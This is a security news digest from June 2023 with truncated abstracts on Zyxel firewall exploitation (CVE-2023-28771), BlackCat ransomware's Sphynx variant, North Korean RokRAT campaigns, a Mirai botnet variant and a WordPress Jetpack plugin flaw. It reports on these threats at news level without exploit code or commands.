IT hygiene is a security best practice that ensures that digital assets in an organization's environment are secure and running properly. Good IT hygiene includes vulnerability management, security configuration assessments, maintaining asset and system inventories, and comprehensive visibility into the activities occurring in an environment. As technology advances and the tools used by cybercriminals and cybersecurity professionals evolve, the strategies used to carry out cyber attacks differ based on their complexity and uniqueness. Threat actors continuously target organizations practicing poor IT hygiene to exploit known security weaknesses and human error. Security administrators can defend against cyberattacks by implementing good IT hygiene practices like whitelisting programs, keeping systems up to date, and more. Gaining complete visibility into the IT assets is fundamental to developing an effective security strategy. The emergence of shadow IT, like rogue assets, sThe Hacker News
June 1, 2023 – Botnet
Widespread exploitation by botnet operators of Zyxel firewall flaw Full Text
Abstract
Threat actors are actively exploiting a command injection flaw, tracked as CVE-2023-28771, in Zyxel firewalls to install malware. Threat actors are actively attempting to exploit a command injection vulnerability, tracked as CVE-2023-28771, that impacts...Security Affairs
June 01, 2023 – Ransomware
Improved BlackCat Ransomware Strikes with Lightning Speed and Stealthy Tactics Full Text
Abstract
The threat actors behind BlackCat ransomware have come up with an improved variant that prioritizes speed and stealth in an attempt to bypass security guardrails and achieve their goals. The new version, dubbed Sphynx and announced in February 2023, packs a "number of updated capabilities that strengthen the group's efforts to evade detection," IBM Security X-Force said in a new analysis. The "product" update was first highlighted by vx-underground in April 2023. Trend Micro, last month, detailed a Linux version of Sphynx that's "focused primarily on its encryption routine." BlackCat , also called ALPHV and Noberus, is the first Rust-language-based ransomware strain spotted in the wild. Active since November 2021, it has emerged as a formidable ransomware actor, victimizing more than 350 targets as of May 2023. The group, like other ransomware-as-a-service (RaaS) offerings, is known to operate a double extortion scheme, deploying cThe Hacker News
June 01, 2023 – Hacker
N. Korean ScarCruft Hackers Exploit LNK Files to Spread RokRAT Full Text
Abstract
Cybersecurity researchers have offered a closer look at the RokRAT remote access trojan that's employed by the North Korean state-sponsored actor known as ScarCruft . "RokRAT is a sophisticated remote access trojan (RAT) that has been observed as a critical component within the attack chain, enabling the threat actors to gain unauthorized access, exfiltrate sensitive information, and potentially maintain persistent control over compromised systems," ThreatMon said . ScarCruft , active since at least 2012, is a cyber espionage group that operates on behalf of the North Korean government, exclusively focusing on targets in its southern counterpart. The group is believed to be a subordinate element within North Korea's Ministry of State Security (MSS). Attack chains mounted by the group have leaned heavily on social engineering to spear-phish victims and deliver payloads onto target networks. This includes exploiting vulnerabilities in Hancom's Hangul WordThe Hacker News
June 01, 2023 – Botnet
Active Mirai Botnet Variant Exploiting Zyxel Devices for DDoS Attacks Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a recently patched critical security flaw in Zyxel gear to its Known Exploited Vulnerabilities ( KEV ) catalog, citing evidence of active exploitation. Tracked as CVE-2023-28771 (CVSS score: 9.8), the issue relates to a command injection flaw impacting different firewall models that could enable an unauthenticated attacker to execute arbitrary code by sending a specially crafted packet to the device. Zyxel addressed the security defect as part of updates released on April 25, 2023. The list of impacted devices is below - ATP (versions ZLD V4.60 to V5.35, patched in ZLD V5.36) USG FLEX (versions ZLD V4.60 to V5.35, patched in ZLD V5.36) VPN (versions ZLD V4.60 to V5.35, patched in ZLD V5.36), and ZyWALL/USG (versions ZLD V4.60 to V4.73, patched in ZLD V4.73 Patch 1) The Shadowserver Foundation, in a recent tweet , said the flaw is "being actively exploited to build a Mirai-like botnet " since MThe Hacker News
June 01, 2023 – Vulnerabilities
Urgent WordPress Update Fixes Critical Flaw in Jetpack Plugin on Million of Sites Full Text
Abstract
WordPress has issued an automatic update to address a critical flaw in the Jetpack plugin that's installed on over five million sites. The vulnerability, which was unearthed during an internal security audit, resides in an API present in the plugin since version 2.0 , which was released in November 2012. "This vulnerability could be used by authors on a site to manipulate any files in the WordPress installation," Jetpack said in an advisory. 102 new versions of Jetpack have been released to remediate the bug. While there is no evidence the issue has been exploited in the wild, it's not uncommon for flaws in popular WordPress plugins to be leveraged by threat actors looking to take over the sites for malicious ends. This is not the first time severe security weaknesses in Jetpack have prompted WordPress to force install the patches. In November 2019, Jetpack released version 7.9.1 to fix a defect in the way the plugin handled embed code that had existed since July 2017 (veThe Hacker News